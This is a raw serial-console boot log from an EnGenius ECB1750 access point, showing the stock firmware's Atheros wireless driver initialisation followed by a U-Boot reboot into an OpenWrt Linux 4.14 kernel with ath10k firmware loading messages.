[ 23.330000] ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
[ 27.320000] br-lan: port 1(eth0) entered forwarding state
hsy:debug: 0
[ 28.240000] Suspending Target – with disable_intr set :wifi1 (sc 87ac9600)
[ 28.240000] waiting for target paused event from target :wifi1 (sc 87ac9600)
[ 28.250000] __ol_ath_detach: init tx/rx cleanup TODO
[ 28.260000] ol_if_dfs_teardown: called
[ 28.260000] ol_ath_phyerr_detach: called
[ 28.270000] CE_fini 2205 Cleaning up HTT Tx CE
[ 28.270000] CE_fini Cleaning up HTT MSG CE(5)
[ 28.280000] Green-AP : Green-AP : Detached
[ 28.280000]
[ 28.280000] Green-AP : Detached
[ 28.290000] ath_pci_warm_reset :(sc 87ac9600)
[ 28.290000] Target Warm Reset
[ 28.290000] Host Intr Cause reg 0x900c : value : 0x4000
[ 28.300000] Target CPU Intr Cause 0x5040
[ 28.400000] addr 0x4050 : 0x4
[ 28.430000] Target CPU Intr Cause after CE reset 0x40
[ 28.430000] RESET_CONTROL after cpu warm reset 0x800
[ 28.540000] Target Warm reset complete
[ 28.540000] ath_pci_remove
[ 28.560000] Green-AP : Green-AP : Detached
[ 28.560000]
[ 28.580000] Removing athdebug proc file
[ 28.590000] ath_dev: driver unloaded
[ 28.600000] ath_dfs: driver unloaded
[ 28.620000] ath_rate_atheros: driver unloaded
[ 28.640000] ath_hal: driver unloaded
[ 32.400000] ****Address of trace_timer :8640e610
[ 34.500000] ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D)
[ 34.530000] ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
[ 34.550000] ath_dfs: Version 2.0.0
[ 34.550000] Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved
[ 34.580000] ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
[ 36.760000] __ath_attach: Set global_scn[0]
[ 36.770000] Enterprise mode: 0x23fc0000
[ 36.780000] Restoring Cal data from DRAM
[ 36.780000]
[ 36.780000] ART Version : 10.347
[ 36.790000] SW Image Version : 0.20.-30.2.5
[ 36.790000] Board Revision : 6
[ 36.790000] ar9300_attach: nf_2_nom -110 nf_2_max -60 nf_2_min -125
[ 36.800000]
[ 36.800000] [5G A/N] scn_handle->scn_disable_band=1,[0,0,0,1]
[ 36.810000] Green-AP : Green-AP : Attached
[ 36.810000]
[ 36.820000] ath_get_caps[6195] rx chainmask mismatch actual 7 sc_chainmak 0
[ 36.830000] ath_get_caps[6170] tx chainmask mismatch actual 7 sc_chainmak 0
[ 36.840000] ath_attach_dfs[12718] dfsdomain 1
[ 36.860000] wifi0: Atheros ???: mem=0xb8100000, irq=47
[ 36.860000] ath_pci: SmartAntenna-DRT-0.1 (Atheros/multi-bss)
[ 36.870000] ath_pci_probe
[ 36.870000] PCI device id is 003c :003c
[ 36.870000] ath_pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit]
[ 36.880000] ath_pci 0000:00:00.0: ath DEBUG: sc=0x87ad1e00
[ 36.890000]
[ 36.890000] ol_ath_pci_configure : num_desired MSI set to 0
[ 36.900000]
[ 36.900000] Using PCI Legacy Interrupt
[ 37.900000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057400
[ 37.900000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057800
[ 37.920000] __ol_ath_attach: ath_attach TODO
[ 37.920000] __ol_ath_attach: dev name wifi1
[ 37.930000] ol_ath_set_default_tgt_config : AC Minfree buffer allocation through module param (umac.ko)
[ 37.940000] OL_ACBKMinfree : 0
[ 37.940000] OL_ACBEMinfree : 0
[ 37.950000] OL_ACVIMinfree : 0
[ 37.950000] OL_ACVOMinfree : 0
[ 37.950000] ol_ath_attach() BMI inited.
[ 37.960000] ol_ath_attach() BMI Get Target Info.
[ 37.960000] ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c
[ 37.970000] NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0
[ 37.970000] ol_ath_attach() configure Target .
[ 37.980000] qc98xx_verify_checksum: flash checksum passed: 0xcab0
[ 37.980000]
[ 37.980000] ========== ac_obey_reg_power = 1
[ 37.990000] ol_transfer_bin_file 2337: Download DRAM data len 2116
[ 38.000000] ol_ath_download_firmware: cal_in_flash=0, ATH_DRAM_DATA_FILE status=0
[ 38.010000] Download AR9888v2_bin
[ 38.010000] ol_transfer_bin_file 2193: Download Firmware data len 235576
[ 39.040000] ol_ath_attach() Download FW.
[ 39.040000] ol_ath_attach() HT Create .
[ 39.040000] ol_ath_attach() HIF Claim.
[ 39.050000] ol_ath_attach() BMI Done.
[ 39.050000] ol_ath_attach() WMI attached. wmi_handle 85bd0000
[ 39.060000] HWT
[ 39.060000] SOC_RESET_CONTROL_ADDRESS : 800
[ 39.060000] CPU_INTR_ADDRESS = [0]
[ 39.070000] SOC_GLOBAL_RESET_ADDRESS = [0]
[ 39.070000] Rx_Filter : [80200]
[ 39.070000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057400
[ 39.080000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057800
[ 39.090000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00057c00
[ 39.100000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058000
[ 39.100000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058400
[ 39.110000] CE_per_engine_handler_adjust, base=87ad1e00 offset=00058800
[ 39.120000] CE_recv_buf_enqueue 654 Populate last entry 512 for CE 5
[ 39.120000] CE_recv_buf_enqueue 663 CE 5 wi 511 dest_ptr 0x67d5040 nbytes 0 recv_ctxt 0x87be9180
[ 39.130000] Target:85b02000 HTC Service:0x0001, ULpipe:0 DLpipe:1 id:0 Ready
[ 39.140000] -HWT
[ 39.140000] Target:85b02000 HTC Service:0x0300, ULpipe:4 DLpipe:5 id:1 Ready
[ 39.150000] HTC Service:0x0300 ep:1 TX flow control disabled
[ 39.160000] CE_pkt_dl_len_set CE 4 Pkt download length 64
[ 39.160000] ol_txrx_pdev_attach: 1424 tx desc’s allocated ; range starts from 87210000
[ 39.170000] Target:85b02000 HTC Service:0x0100, ULpipe:3 DLpipe:2 id:2 Ready
[ 39.180000] HTC Service:0x0100 ep:2 TX flow control disabled
[ 39.190000] wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event
[ 39.190000] num_rf_chain : 00000003
[ 39.200000] ht_cap_info: : 0000085b
[ 39.200000] vht_cap_info : 338001b2
[ 39.200000] vht_supp_mcs : 0000ffea
[ 39.210000] LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256, lteu_support 0
[ 39.210000] idx 0 req 1 num_units 0 num_unit_info 2 unit size 440 actual units 145
[ 39.220000] chunk 0 len 63800 requested ,ptr 0x7220000
[ 39.240000] FIRMWARE:P 145 V 16 T 443
[ 39.240000]
[ 39.240000] FIRMWARE:_wlan_rtt_enable
[ 39.250000] wmi_ready_event_rx: WMI UNIFIED READY event
[ 39.250000] ol_ath_connect_htc() WMI is ready
[ 39.260000] ol_ath_set_host_app_area TODO
[ 39.260000] target uses HTT version 2.1; host uses 2.1
[ 39.270000] ol_ath_attach() connect HTC.
[ 39.280000] bypasswmi : 0
[ 39.280000] ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0.
[ 39.290000]
[ 39.290000] [5G AC] scn_handle->scn_disable_band=1,[0,0,0,1]
[ 39.300000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150
[ 39.310000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0
[ 39.310000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0
[ 39.320000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0
[ 39.330000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150
[ 39.330000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080
[ 39.340000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080
[ 39.350000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080
[ 39.360000] Add VHT80 channel: 5210
[ 39.360000] Add VHT80 channel: 5290
[ 39.360000] Add VHT80 channel: 5530
[ 39.370000] Add VHT80 channel: 5610
[ 39.370000] Add VHT80 channel: 5690
[ 39.370000] Add VHT80 channel: 5775
[ 39.380000] Skipping VHT80 channel 5825
[ 39.380000] ol_ath_phyerr_attach: called
[ 39.390000] OL Resmgr Init-ed
[ 39.390000] Green-AP : Green-AP : Attached
[ 39.390000]
[ 39.400000] Green-AP : Attached
[ 39.400000] ol_if_dfs_setup: called
[ 39.400000] ol_if_dfs_attach: called; ptr=856ad974, radar_info=87025b70
[ 39.410000] ol_ath_rtt_meas_report_attach: called
[ 39.410000] ol_ath_attach() UMAC attach .
[ 39.420000] ol_if_dfs_configure: called
[ 39.420000] ol_if_dfs_configure: FCC domain
[ 39.430000] ol_if_dfs_disable: called
[ 39.430000] ol_ath_attach: Calling ol_if_dfs_configure
[ 39.440000] __ol_ath_attach: init tx/rx TODO
[ 39.440000] __ol_ath_attach: hard_header_len reservation 58
[ 39.790000]
[ 39.790000] [5G AC] scn_handle->scn_disable_band=9,[1,0,0,1]
[ 39.800000] isCountryCodeValid: EEPROM regdomain 0x0
[ 39.800000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150
[ 39.810000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0
[ 39.810000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0
[ 39.820000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0
[ 39.830000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150
[ 39.840000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080
[ 39.840000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080
[ 39.850000] ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080
[ 39.860000] Add VHT80 channel: 5210
[ 39.860000] Add VHT80 channel: 5290
[ 39.870000] Add VHT80 channel: 5530
[ 39.870000] Add VHT80 channel: 5610
[ 39.870000] Add VHT80 channel: 5690
[ 39.880000] Add VHT80 channel: 5775
[ 39.880000] Skipping VHT80 channel 5825
[ 40.020000] ath_ioctl: SIOC80211IFCREATE CALLED
[ 40.020000] wmi_unified_vdev_create_send: ID = 0 VAP Addr = 88:dc:96:39:d9:a3:
[ 40.030000] Setting dscp for vap id: 0
[ 40.030000] VAP device ath1 created osifp: (87173380) os_if: (858a0000)
[ 40.050000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x3, 0x1e, 0x460, 0x460, 0x0 )
[ 40.060000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x12, 0x1e, 0x460, 0x460, 0x0 )
[ 40.070000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x45, 0x1e, 0x460, 0x460, 0x0 )
[ 40.080000] [wifi1] FWLOG: [48564] WAL_DBGID_TX_AC_BUFFER_SET ( 0x67, 0x1e, 0x460, 0x460, 0x0 )
[ 40.090000] [wifi1] FWLOG: [48569] WHAL_ERROR_RECV_STOPPCU ( 0x110298a, 0x3 )
[ 40.100000] [wifi1] FWLOG: [48569] WHAL_ERROR_RESET_PM ( )
[ 40.100000] [wifi1] FWLOG: [48576] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 40.110000] [wifi1] FWLOG: [48768] ANI Enable: 1
[ 40.110000] [wifi1] FWLOG: [48776] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 40.120000] [wifi1] FWLOG: [49278] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 40.130000] [wifi1] FWLOG: [49286] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 40.140000] Set freq vap 0 stop send 858a0000
[ 40.150000] OL vap_stop
[ 40.150000] wmi_unified_vdev_stop_send for vap 0 (85bd0000)
[ 40.160000] OL vap_stop –
[ 40.160000] STOPPED EVENT for vap 0 (85bd0000)
[ 40.160000] Set freq vap 0 stop send -858a0000
[ 40.300000] Set wait done –858a0000
hsy:preset 11k (ath1) to disable
[ 40.360000] ol_ath_desc_alloc_and_mark_for_mcast_clone: VAP Mcast to Unicast buffer allocated: 400
[ 40.370000] ol_ath_vap_set_param: VAP param is now supported param:67 value:2
[ 40.430000]
[ 40.430000] DES SSID SET=
[ 40.440000]
[ 40.440000] DES SSID SET=EnGenius39D9A3_1-5GHz
[ 40.870000] device ath1 entered promiscuous mode
[ 41.050000] [wifi1] FWLOG: [49774] RATE: NEW NSS 3
[ 41.060000]
[ 41.600000] OL vap_stop
[ 41.600000] wmi_unified_vdev_stop_send for vap 0 (85bd0000)
[ 41.600000] OL vap_stop –
[ 41.610000] STOPPED EVENT for vap 0 (85bd0000)
[ 41.740000] wmi_unified_scan_start_send for vap 0 (85bd0000)
[ 41.740000] br-lan: port 2(ath1) entered forwarding state
[ 41.750000] br-lan: port 2(ath1) entered forwarding state
[ 41.750000] 8021q: adding VLAN 0 to HW filter on device ath1
[ 44.440000] OL vap_start
[ 44.450000] wmi_unified_vdev_start_send for vap 0 (85bd0000)
[ 44.450000] OL vap_start –
[ 44.460000] ol_vdev_start_resp_ev for vap 0 (85bd0000)
[ 44.460000] ol_ath_vap_join: join operation is only for STA/IBSS mode
[ 44.470000] ol_ath_wmm_update:
[ 44.470000]
[ 44.470000] ieee80211_dfs_cac_start = 1
[ 44.480000] wmi_unified_vdev_up_send for vap 0 (85bd0000)
[ 44.480000] Notification to UMAC VAP layer
[ 45.760000] br-lan: port 2(ath1) entered forwarding state
[ 46.130000] ath_attach_dfs[12718] dfsdomain 1
[ 46.160000]
[ 46.160000] [5G A/N] scn_handle->scn_disable_band=9,[1,0,0,1]
[ 46.220000] DCS for CW interference mitigation: 0
[ 46.220000] DCS for WLAN interference mitigation: 0
[ 46.240000] VAP device ath0 created osifp: (864dcb80) os_if: (872e8000)
[ 46.260000] Set freq vap 0 stop send 872e8000
[ 46.270000] Set freq vap 0 stop send -872e8000
[ 46.400000] Set wait done –872e8000
hsy:preset 11k (ath0) to disable
[ 46.510000]
[ 46.510000] DES SSID SET=
[ 46.520000]
[ 46.520000] DES SSID SET=EnGenius39D9A2_1-2.4GHz
[ 46.960000] device ath0 entered promiscuous mode
[ 47.850000] br-lan: port 3(ath0) entered forwarding state
[ 47.850000] br-lan: port 3(ath0) entered forwarding state
[ 47.870000] 8021q: adding VLAN 0 to HW filter on device ath0
[ 50.220000]
[ 50.220000] ieee80211_dfs_cac_start = 1
[ 50.290000]
[ 50.290000] ieee80211_dfs_cac_start = 1
[ 50.300000]
[ 50.300000] ieee80211_dfs_cac_start = 1
[ 51.060000] [wifi1] FWLOG: [60212] WAL_DBGID_DEV_RESET ( 0x1, 0x1, 0x1 )
[ 51.060000] [wifi1] FWLOG: [60212] WAL_DBGID_DEV_TX_TIMEOUT ( 0x9 )
[ 51.860000] br-lan: port 3(ath0) entered forwarding state
U-Boot 1.1.4 (v1.0.0) (Nov 6 2022 – 12:56:32)
ECB1200_1750 – Scorpion 1.0DRAM:
sri
Scorpion 1.0
ath_ddr_initial_config(200): (32bit) ddr2 init
tap = 0x00000003
Tap (low, high) = (0x4, 0x1c)
Tap values = (0x10, 0x10, 0x10, 0x10)
128 MB
Top of RAM usable for U-Boot at: 88000000
Reserving 216k for U-Boot at: 87fc8000
Reserving 192k for malloc() at: 87f98000
Reserving 44 Bytes for Board Info at: 87f97fd4
Reserving 36 Bytes for Global Data at: 87f97fb0
Reserving 128k for boot params() at: 87f77fb0
Stack Pointer at: 87f77f98
Now running in RAM – U-Boot at: 87fc8000
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
*** Warning *** : 2nd PCIe WLAN Module not found !!!
In: serial
Out: serial
Err: serial
Net: ath_gmac_enet_initialize…
athrs_sgmii_res_cal: cal value = 0x1
Fetching MAC Address from 0x87feb810
ath_gmac_enet_initialize: reset mask:c02200
Scorpion —-> AR8035 PHY *
AR8035 PHY init
: cfg1 0xf cfg2 0x7135
eth0: 88:dc:96:11:22:fe
ATHR8035_PHY: Phy 5, Neg Success
ATHR8035_PHY: unit 0 phy addr 5 eth0 up
eth0
Setting 0x18116290 to 0x58b1a14f
Hit any key to stop autoboot: 0
## Booting image at 9f050000 …
Image Name: MIPS OpenWrt Linux-4.14.111
Created: 2022-04-15 11:33:59 UTC
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 1615111 Bytes = 1.5 MB
Load Address: 80060000
Entry Point: 80060000
Verifying Checksum at 0x9f050040 …OK
Uncompressing Kernel Image … OK
No initrd
## Transferring control to Linux (at address 80060000) …
## Giving linux memsize in bytes, 134217728
Starting kernel …
[ 0.000000] Linux version 4.14.111 ([email protected]) (gcc version 7.4.0 (OpenWrt GCC 7.4.0 r9733 22-e1444ab59c)) #0 Mon Apr 15 11:33:59 2022
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019750 (MIPS 74Kc)
[ 0.000000] MIPS: machine is EnGenius ECB1750
[ 0.000000] SoC: Qualcomm Atheros QCA9558 ver 1 rev 0
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 08000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty – disabling initrd
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] random: get_random_bytes called from start_kernel 0x8c/0x474 with crng_init=0
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32512
[ 0.000000] Kernel command line: console=ttyS0,115200n8 rootfstype=squashfs,jffs2
[ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Writing ErrCtl register=00000000
[ 0.000000] Readback ErrCtl register=00000000
[ 0.000000] Memory: 123184K/131072K available (3777K kernel code, 151K rwdata, 912K rodata, 1232K init, 204K bss, 7888K reserved, 0K cma-reserv
ed)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] NR_IRQS: 51
[ 0.000000] CPU clock: 720.000 MHz
[ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 5309056796 ns
[ 0.000007] sched_clock: 32 bits at 360MHz, resolution 2ns, wraps every 5965232126ns
[ 0.008291] Calibrating delay loop… 358.80 BogoMIPS (lpj=1794048)
[ 0.074984] pid_max: default: 32768 minimum: 301
[ 0.080065] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.087102] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.097994] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.108491] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.115040] pinctrl core: initialized pinctrl subsystem
[ 0.121340] NET: Registered protocol family 16
[ 0.131709] PCI host bridge /ahb/apb/[email protected] ranges:
[ 0.138570] MEM 0x0000000010000000..0x0000000011ffffff
[ 0.144151] IO 0x0000000000000000..0x0000000000000000
[ 0.163163] PCI host bridge to bus 0000:00
[ 0.167564] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff]
[ 0.174872] pci_bus 0000:00: root bus resource [io 0x0000]
[ 0.180803] pci_bus 0000:00: root bus resource [??? 0x00000000 flags 0x0]
[ 0.188019] pci_bus 0000:00: No busn resource found for root bus, will use [bus 00-ff]
[ 0.196869] pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit]
[ 0.204661] pci 0000:00:00.0: BAR 6: assigned [mem 0x10200000-0x1020ffff pref]
[ 0.214389] clocksource: Switched to clocksource MIPS
[ 0.220572] NET: Registered protocol family 2
[ 0.225863] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.233283] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.240086] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.246960] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.253178] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.260080] NET: Registered protocol family 1
[ 0.267090] Crashlog allocated RAM at address 0x3f00000
[ 0.273631] workingset: timestamp_bits=30 max_order=15 bucket_order=0
[ 0.284359] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.290596] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.308030] io scheduler noop registered
[ 0.312200] io scheduler deadline registered (default)
[ 0.319468] pinctrl-single 1804002c.pinmux: 544 pins at pa b804002c size 68
[ 0.327751] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[ 0.335131] console [ttyS0] disabled
[ 0.338960] 18020000.uart: ttyS0 at MMIO 0x18020000 (irq = 9, base_baud = 2500000) is a 16550A
[ 0.348165] console [ttyS0] enabled
[ 0.348165] console [ttyS0] enabled
[ 0.355581] bootconsole [early0] disabled
[ 0.355581] bootconsole [early0] disabled
[ 0.368966] m25p80 spi0.0: mx25l12805d (16384 Kbytes)
[ 0.374131] 5 fixed-partitions partitions found on MTD device spi0.0
[ 0.380612] Creating 5 MTD partitions on “spi0.0”:
[ 0.385483] 0x000000000000-0x000000040000 : “u-boot”
[ 0.391168] 0x000000040000-0x000000050000 : “u-boot-env”
[ 0.397209] 0x000000050000-0x000000fa0000 : “firmware”
[ 0.437104] 2 uimage-fw partitions found on MTD device firmware
[ 0.443122] 0x000000050000-0x0000001da547 : “kernel”
[ 0.448767] 0x0000001da547-0x000000fa0000 : “rootfs”
[ 0.454354] mtd: device 4 (rootfs) set to be root filesystem
[ 0.460174] 1 squashfs-split partitions found on MTD device rootfs
[ 0.466464] 0x0000004b0000-0x000000fa0000 : “rootfs_data”
[ 0.472528] 0x000000fa0000-0x000000ff0000 : “userconfig”
[ 0.478554] 0x000000ff0000-0x000001000000 : “art”
[ 0.484862] libphy: Fixed MDIO Bus: probed
[ 0.491025] ag71xx 19000000.eth: invalid MAC address, using random address
[ 0.836081] libphy: ag71xx_mdio: probed
[ 0.935002] ag71xx 19000000.eth: connected to PHY at mdio-bus.0:05 [uid=004dd072, driver=Atheros 8035 ethernet]
[ 0.945766] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode: rgmii-rxid
[ 0.954218] NET: Registered protocol family 10
[ 0.962065] Segment Routing with IPv6
[ 0.965910] NET: Registered protocol family 17
[ 0.970458] 8021q: 802.1Q VLAN Support v1.8
[ 0.981195] VFS: Mounted root (squashfs filesystem) readonly on device 31:4.
[ 0.992790] Freeing unused kernel memory: 1232K
[ 0.997405] This architecture does not have kernel memory protection.
[ 1.736969] init: Console is alive
[ 1.740607] init: – watchdog –
[ 2.434428] random: fast init done
[ 2.829076] kmodloader: loading kernel modules from /etc/modules-boot.d/*
[ 2.955746] kmodloader: done loading kernel modules from /etc/modules-boot.d/*
[ 2.964307] init: – preinit –
[ 4.287710] random: jshn: uninitialized urandom read (4 bytes read)
[ 4.536398] random: jshn: uninitialized urandom read (4 bytes read)
[ 4.683473] random: jshn: uninitialized urandom read (4 bytes read)
[ 4.894473] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
Press the [f] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
[ 8.065627] eth0: link up (1000Mbps/Full duplex)
[ 8.070344] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 8.235183] jffs2: notice: (430) jffs2_build_xattr_subsystem: complete building xattr subsystem, 4 of xdatum (2 unchecked, 2 orphan) and 33 of
xref (2 dead, 0 orphan) found.
[ 8.252933] mount_root: switching to jffs2 overlay
[ 8.277783] overlayfs: upper fs does not support tmpfile.
[ 8.290934] urandom-seed: Seeding with /etc/urandom.seed
[ 8.385545] eth0: link down
[ 8.399108] procd: – early –
[ 8.402115] procd: – watchdog –
[ 8.535644] procd: cannot set group dialout for /dev/ttyS0
[ 9.044487] procd: – watchdog –
[ 9.047897] procd: – ubus –
[ 9.116928] urandom_read: 5 callbacks suppressed
[ 9.116935] random: ubusd: uninitialized urandom read (4 bytes read)
[ 9.129890] random: ubusd: uninitialized urandom read (4 bytes read)
[ 9.137528] procd: – init –
Please press Enter to activate this console.
[ 9.636128] kmodloader: loading kernel modules from /etc/modules.d/*
[ 9.647792] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 9.660568] Loading modules backported from Linux version v4.19.32-0-g3a2156c839c7
[ 9.668298] Backport generated by backports.git v4.19.32-1-0-g1c4f7569
[ 9.677976] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 9.690126] nf_conntrack version 0.5.0 (2048 buckets, 8192 max)
[ 9.742328] xt_time: kernel timezone is -0000
[ 9.793634] PPP generic driver version 2.4.2
[ 9.800569] NET: Registered protocol family 24
[ 9.828443] ath10k 4.19 driver, optimized for CT firmware, probing pci device: 0x3c.
[ 9.837484] PCI: Enabling device 0000:00:00.0 (0000 -> 0002)
[ 9.843374] ath10k_pci 0000:00:00.0: pci irq legacy oper_irq_mode 1 irq_mode 0 reset_mode 0
[ 10.118585] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/fwcfg-pci-0000:00:00.0.txt failed with error -2
[ 10.129294] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 10.289590] firmware ath10k!fwcfg-pci-0000:00:00.0.txt: firmware_loading_store: map pages failed
[ 10.298780] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/pre-cal-pci-0000:00:00.0.bin failed with error -2
[ 10.309664] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 10.490868] firmware ath10k!pre-cal-pci-0000:00:00.0.bin: firmware_loading_store: map pages failed
[ 10.502802] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/ct-firmware-5.bin failed with error -2
[ 10.513955] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 10.744053] firmware ath10k!QCA988X!hw2.0!ct-firmware-5.bin: firmware_loading_store: map pages failed
[ 10.753681] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/ct-firmware-2.bin failed with error -2
[ 10.764826] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 10.944249] firmware ath10k!QCA988X!hw2.0!ct-firmware-2.bin: firmware_loading_store: map pages failed
[ 10.953898] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-6.bin failed with error -2
[ 10.964781] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 11.143272] firmware ath10k!QCA988X!hw2.0!firmware-6.bin: firmware_loading_store: map pages failed
[ 11.152632] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-5.bin failed with error -2
[ 11.163510] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 11.343050] firmware ath10k!QCA988X!hw2.0!firmware-5.bin: firmware_loading_store: map pages failed
[ 11.352432] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-4.bin failed with error -2
[ 11.363315] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 11.540730] firmware ath10k!QCA988X!hw2.0!firmware-4.bin: firmware_loading_store: map pages failed
[ 11.550095] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-3.bin failed with error -2
[ 11.560970] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 11.739673] firmware ath10k!QCA988X!hw2.0!firmware-3.bin: firmware_loading_store: map pages failed
[ 11.948432] ath10k_pci 0000:00:00.0: qca988x hw2.0 target 0x4100016c chip_id 0x043202ff sub 0000:0000
[ 11.957826] ath10k_pci 0000:00:00.0: kconfig debug 0 debugfs 1 tracing 0 dfs 1 testmode 0
[ 11.970227] ath10k_pci 0000:00:00.0: firmware ver 10.1-ct-8x-__fW-022-883e26a8 api 2 features wmi-10.x,has-wmi-mgmt-tx,mfp,txstatus-noack,wmi-1
0.x-CT,ratemask-CT,txrate-CT,get-temp-CT,tx-rc-CT,cust-stats-CT,retry-gt2-CT,txrate2-CT,beacon-cb-CT crc32 7a67ce60
[ 12.021110] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/board-2.bin failed with error -2
[ 12.031722] ath10k_pci 0000:00:00.0: Falling back to user helper
[ 12.123159] firmware ath10k!QCA988X!hw2.0!board-2.bin: firmware_loading_store: map pages failed
[ 12.132414] ath10k_pci 0000:00:00.0: board_file api 1 bmi_id N/A crc32 bebc7c08
